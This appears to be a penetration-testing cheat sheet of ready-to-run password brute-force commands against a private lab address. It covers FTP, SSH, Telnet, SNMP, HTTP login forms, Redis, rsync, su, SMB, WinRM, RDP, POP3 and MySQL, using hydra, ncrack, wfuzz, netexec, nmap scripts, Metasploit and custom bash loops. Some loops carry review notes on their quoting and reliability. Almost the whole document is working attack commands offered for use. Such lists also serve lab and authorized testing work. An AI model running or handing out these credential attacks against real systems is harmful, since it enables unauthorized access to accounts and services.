Brute Force
FTP
# default port
hydra -t 64 -l admin -P rockyou.txt ftp://192.168.1.2
ncrack -v -f --user admin -P rockyou.txt ftp://192.168.1.2
# other port
hydra -t 64 -l admin -P rockyou.txt ftp://192.168.1.2:1234
ncrack -v -f --user admin -P rockyou.txt ftp://192.168.1.2:1234
# colon separated "user:pass"
hydra -C ftp-betterdefaultpasslist.txt ftp://192.168.1.2
FTPS
hydra -t 64 -l ftpuser -P rockyou.txt ftps://192.168.1.2 -f -I
SSH
# default port
hydra -t 64 -l admin -P rockyou.txt ssh://192.168.1.2
ncrack --user admin -P rockyou.txt 192.168.1.2:22 -f
# other port
hydra -t 64 -l admin -P rockyou.txt ssh://192.168.1.2:1234
ncrack --user admin -P rockyou.txt 192.168.1.2:1234 -f
# metasploit
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.1.2
set USERNAME root
set PASS_FILE rockyou.txt
set VERBOSE true
run
Telnet
# WARNING: do not use threads (-t)
hydra -l admin -P rockyou.txt telnet://192.168.1.2
SNMP (Community Strings)
onesixtyone 192.168.1.2 -c community-strings.dic
hydra -P community-strings.dic snmp://192.168.1.2
HTTP
GET
Basic Auth
wfuzz -t 200 -c -w /opt/techyou.txt --basic "peter:FUZZ" -u "http://192.168.1.2/login/" --hh=179
hydra -t 64 -l peter -P /opt/techyou.txt http-get://192.168.1.2/login/
Digest
wfuzz -c -w /opt/techyou.txt --digest "peter:FUZZ" -u "http://192.168.1.2/login/" --hh=459
hydra -t 64 -l peter -P /opt/techyou.txt http-get://192.168.1.2/login/
POST
Hydra
# Password
hydra -t 64 -l peter -P /opt/techyou.txt 192.168.1.2 http-form-post "/admin/login.php:user=peter&password=^PASS^:Invalid Credentials"
hydra -t 64 -l peter -P /opt/techyou.txt 192.168.1.2 http-form-post "/admin/login.php:user=peter&password=^PASS^:F=Invalid Credentials"
# Only Password (NO Username)
hydra -t 64 -l none -P /opt/techyou.txt 192.168.1.2 http-post-form "/admin/login.php:password=^PASS^:Invalid Password"
Bash
# Reads /opt/techyou.txt one line at a time (IFS= read -r keeps leading/trailing blanks and backslashes),
# rewrites a status line in place (\r + `tput el`), POSTs user=peter&password=<line> to the login page and
# stops at the first response body that does NOT contain "Invalid Credentials".
# NOTE(review): `grep -q` also fails when curl returns nothing (connection error, timeout), so such a
# failure is reported as a hit; `echo -ne`/`echo -e` and the `\r` redraw assume bash's echo.
while IFS= read -r pass; do echo -ne "\r[-] Testing Password : $pass"; tput el; curl -s "http://192.168.1.2/admin/login.php" -d "user=peter&password=$pass" | grep -q "Invalid Credentials" || { echo -e "\n[+] Found Password : $pass"; break; }; done < /opt/techyou.txt
Wfuzz
--hc/hl/hw/hh - Hide responses with the specified code/lines/words/chars
--sc/sl/sw/sh - Show responses with the specified code/lines/words/chars
--ss/hs (regex) - Show/Hide responses with the specified regex within the content
# Password - Hide Chars (--hh)
wfuzz -t 200 -c -w /opt/techyou.txt -d "user=peter&password=FUZZ" -u "http://192.168.1.2/admin/login.php" --hh=19
# Password + Username - Hide Chars (--hh)
wfuzz -c -w users.dic -w pass.dic -d "user=FUZZ&password=FUZ2Z" -u "http://192.168.1.2/admin/login.php" --hh=19
# Password - Hide Content Response (--hs) [regex: Invalid Credentials]
wfuzz -t 200 -c -w /opt/techyou.txt -d "user=peter&password=FUZZ" -u "http://192.168.1.2/admin/login.php" --hs "Invalid Credentials"
# Password - Numbers (PIN)
wfuzz -t 200 -c -z range,0000-9999 -d "username=peter&password=FUZZ" -u "http://192.168.1.2/admin/login.php" --hh=19
Redis
# default port
hydra -t 64 redis://192.168.1.2 -P rockyou.txt
nmap -p6379 --script="redis-brute" 192.168.1.2
# other port
hydra -t 64 redis://192.168.1.2:1234 -P rockyou.txt
nmap -p1234 --script="redis-brute" 192.168.1.2
Rsync
Modules
# Reads candidate module names from /opt/common.txt and tries `rsync 192.168.1.2::<name>` for each,
# with a 0.5 s cap per attempt; the loop stops at the first attempt that exits 0.
# NOTE(review): `${line}` is unquoted in both places, so a line with spaces or glob characters is
# word-split/expanded before it reaches rsync; `$?` is the exit status of the last pipeline stage
# (timeout/rsync), and timeout reports 124 when the cap expires, which counts as a miss.
# `&>/dev/null` is bash syntax, not POSIX sh.
while IFS= read -r line; do echo ${line} | timeout 0.5 rsync 192.168.1.2::${line} &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/common.txt
Password
# Reads candidate passwords from /opt/techyou.txt and runs rsync over SSH as peter via `sshpass -p`,
# 0.5 s cap per attempt; the loop stops at the first attempt that exits 0.
# NOTE(review): `${line}` is unquoted, so spaces/glob characters in a candidate are split or expanded
# before sshpass sees them; `sshpass -p` also places the value on the command line, where it is
# visible to other users of the host through the process list. `$?` reflects the last pipeline
# stage only, and timeout's 124 on expiry is treated as a miss. `&>/dev/null` is bash-only.
while IFS= read -r line; do echo ${line} | timeout 0.5 sshpass -p ${line} rsync rsync://peter@192.168.1.2/share/ &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/techyou.txt
su
# Reads candidate passwords from techyou.txt, pipes each into `su peter` with a 2 s cap, and prints
# the candidate on the first attempt that exits 0.
# NOTE(review): whether su accepts a password from a pipe depends on the su/PAM implementation —
# many read only from the controlling tty — confirm before relying on this. `$line` is unquoted
# (word-splitting/globbing), and `echo $line` will misread a candidate that looks like an echo
# option such as `-n` or `-e`. The printed candidate is the password itself; it ends up in any
# captured output or shell history.
while IFS= read -r line; do echo $line | timeout 2 su peter 2>/dev/null; if [ $? -eq 0 ]; then echo $line; break; fi; done < techyou.txt
SMB
netexec smb 192.168.1.2 -u peter -p rockyou.txt
netexec smb 192.168.1.2 -u peter -p rockyou.txt --local-auth
WinRM
netexec winrm 192.168.1.2 -u administrator -p rockyou.txt
RDP
hydra -t 64 -l admin -P rockyou.txt rdp://192.168.1.2
POP3
hydra -t 64 -l admin -P rockyou.txt pop3://192.168.1.2
MySQL
hydra -t 64 -l root -P rockyou.txt mysql://192.168.1.2
ncrack --user root -P rockyou.txt mysql://192.168.1.2:3306